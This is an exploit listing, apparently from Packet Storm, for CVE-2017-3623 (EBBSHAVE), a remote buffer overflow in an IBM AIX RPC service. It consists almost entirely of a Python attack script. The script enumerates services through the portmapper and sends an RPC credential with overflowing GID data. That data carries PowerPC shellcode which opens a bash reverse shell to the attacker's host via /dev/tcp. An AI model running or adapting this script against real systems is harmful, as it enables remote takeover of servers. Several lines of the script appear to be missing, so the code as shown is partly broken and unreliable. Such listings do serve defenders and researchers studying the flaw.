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packetstormHarrison NealPACKETSTORM:155876
HistoryJan 08, 2020 - 12:00 a.m.

EBBISLAND EBBSHAVE 6100-09-04-1441 Remote Buffer Overflow

Harrison Neal

0.912 High




`# Exploit Title: EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow  
# Date: 2018-09-19  
# Exploit Author: Harrison Neal  
# Vendor Homepage:  
# Version: 6100-09-04-1441, 7100-03-05-1524, 7100-04-00-0000, 7200-01-01-1642  
# Tested on: IBM AIX PPC  
# CVE: CVE-2017-3623  
# Usage: rhost lhost lport gid_base execl_func execl_toc  
# Exploit code example; shellcode requires /usr/bin/bash on the target  
# Example values for my AIX 7.2 LPAR:  
# gid_base: 3007d390  
# execl_func: d0307940  
# execl_toc: f081bc20  
# CAUTION: If a RPC service repeatedly crashes, it can be automatically disabled  
from os import urandom  
from socket import socket, AF_INET, SOCK_STREAM  
from struct import pack, unpack  
from sys import argv, exit  
from time import time, sleep  
def getCredLoopbackBody():  
global gid_base, rhost, lhost, lport, gid_base, execl_func, execl_toc  
epoch = pack('>I', time()) # Make sure the system clock is in sync w/ target  
# Doesn't matter, ljust call assumes len <= 4  
node_name = 'hn'  
node_length = pack('>I', len(node_name))  
node_name = node_name.ljust(4, '\x00')  
# Also doesn't matter  
uid = pack('>I', 0)  
gid = pack('>I', 0)  
# Big enough to trigger an overflow  
# Not big enough to trigger defensive code  
# You could make this a little bit less,  
# but you'd have to tweak the part 2 code  
gids_len = pack('>I', 64)  
base_addr = pack('>I', gid_base)  
addr_8c = pack('>I', gid_base + 0x8c)  
addr_a8 = pack('>I', gid_base + 0xa8)  
addr_4c = pack('>I', gid_base + 0x4c)  
func_addr = pack('>I', execl_func)  
toc_addr = pack('>I', execl_toc)  
cmd = 'bash -i >& /dev/tcp/' + lhost + '/' + lport + ' 0>&1'  
cmd = cmd.ljust(0x30, '\x00')  
# Each GID is 4 bytes long, we want 64  
gids = (  
# +0x0 # filepath  
# +0x10 # argv[0]  
# +0x18 # argv[1]  
# +0x1c # argv[2]  
) + cmd + (  
# +0x4c # r3 = filepath  
'\x70\x63\x00\x00' # andi. r3, r3, 0x0  
) + base_addr[0:2] + ( # lis r3, ...  
) + base_addr[2:4] + ( # ori r3, r3, ...  
# +0x58 # r4 = argv[0]  
'\x38\x83\x00\x10' # addi r4, r3, 0x10  
# +0x5c # r5 = argv[1]  
'\x38\xa4\x00\x08' # addi r5, r4, 0x8  
# +0x60 # r6 = argv[2]  
'\x38\xc5\x00\x04' # addi r6, r5, 0x4  
# +0x64 # r7 = NULL  
'\x70\xe7\x00\x00' # andi. r7, r7, 0x0  
# +0x68 # r2 = libc.a TOC for execl  
'\x70\x42\x00\x00' # andi. r2, r2, 0x0  
) + toc_addr[0:2] + ( # lis r2, ...  
) + toc_addr[2:4] + ( # ori r2, r2, ...  
# +0x74 # execl  
'\x71\x08\x00\x00' # andi. r8, r8, 0x0  
) + func_addr[0:2] + ( # lis r8, ...  
) + func_addr[2:4] + ( # ori r8, ...  
'\x7d\x09\x03\xa6' # mtctr r8  
'\x4e\x80\x04\x21' # bctrl  
# +0x88 # 0x14 padding  
# +0x9c # Will be NULL  
# +0xa0  
# @+948: r5 = +0x8c  
# @+968: r5 = *(+0x8c + 0x18) = *(+0xa4)  
# +0xa4  
# @+968: r5 = +0xa8  
# @+972: r0 = *(r5 + 0x0) = *(+0xa8)  
# +0xa8  
# @+972: r0 = +0x4c  
# @+980: ctr = r0 = +0x4c  
# @+988: branch to ctr  
) + addr_8c + addr_a8 + addr_4c + (  
# +0xac # padding  
print ":".join("{:02x}".format(ord(c)) for c in gids)  
print len(gids)  
return epoch + node_length + node_name + uid + gid + gids_len + gids  
def getCredLoopback():  
cred_flavor = pack('>I', 0x55de) # AUTH_LOOPBACK  
cred_body = getCredLoopbackBody()  
cred_len = pack('>I', len(cred_body))  
return cred_flavor + cred_len + cred_body  
def getAuthNone():  
auth_flavor = pack('>I', 0) # AUTH_NONE  
auth_len = pack('>I', 0)  
return auth_flavor + auth_len  
def getMessage(prog_num, ver_num, proc_num, use_loopback_cred):  
xid = urandom(4)  
mtype = pack('>I', 0) # CALL  
rpcvers = pack('>I', 2)  
prog = pack('>I', prog_num)  
vers = pack('>I', ver_num)  
proc = pack('>I', proc_num)  
cred = ( getCredLoopback() if use_loopback_cred else getAuthNone() )  
verf = getAuthNone()  
return xid + mtype + rpcvers + prog + vers + proc + cred + verf  
def getPacket(message):  
# MSB on = this is the last fragment  
# LSBs = fragment length  
frag = pack('>I', len(message) + 0x80000000)  
return frag + message  
if len(argv) < 7:  
print 'Usage: rhost lhost lport gid_base execl_func execl_toc'  
rhost = argv[1]  
lhost = argv[2]  
lport = argv[3]  
gid_base = int(argv[4], 16)  
execl_func = int(argv[5], 16)  
execl_toc = int(argv[6], 16)  
# Query the portmapper for services  
services = []  
s = socket(AF_INET, SOCK_STREAM)  
s.connect((rhost, 111)) # port 111 for portmapper  
100000, # portmapper  
2, # version 2  
4, # DUMP  
False # unauth request  
s.recv(0x1c) # skip over fragment length, XID, message type, reply state, verifier, accept state  
while list(unpack('>I', s.recv(4)))[0]: # while next "value follows" field is true  
prog_num, ver_num, proto_num, port = unpack('>IIII', s.recv(16))  
if (prog_num == 100024 # status  
and proto_num == 6): # TCP  
print '[ ] Found service ' + str(prog_num) + ' v' + str(ver_num) + ' on TCP port ' + str(port)  
services.append((prog_num, ver_num, port))  
# Try attacking  
for service in services:  
prog_num, ver_num, port = service  
serv_str = str(prog_num) + ' v' + str(ver_num)  
for attack in [False, True]:  
sleep(1) # be gentle  
print '[ ] ' + ( 'Attacking' if attack else 'Pinging' ) + ' ' + serv_str  
s = socket(AF_INET, SOCK_STREAM)  
s.connect((rhost, port))  
resp_len = 0  
0, # NULL, acts like a ping  
s.settimeout(5) # give inetd/... a chance to spin up the service if needed  
resp_len = len( s.recv(1024) ) # try to receive up to 1024 bytes  
resp_len = 0 # typically either timeout, connection error, or Ctrl+C  
s.close() # try closing the connection if it isn't already dead  
pass # connection is probably already dead  
print '[ ] Got response length ' + str(resp_len)  
if resp_len == 0: # suspect the service either timed out or crashed  
if attack:  
print '[+] Probably vulnerable to EBBSHAVE, hopefully you have a shell'  
print '[-] Service probably down or otherwise misbehaving, skipping...'  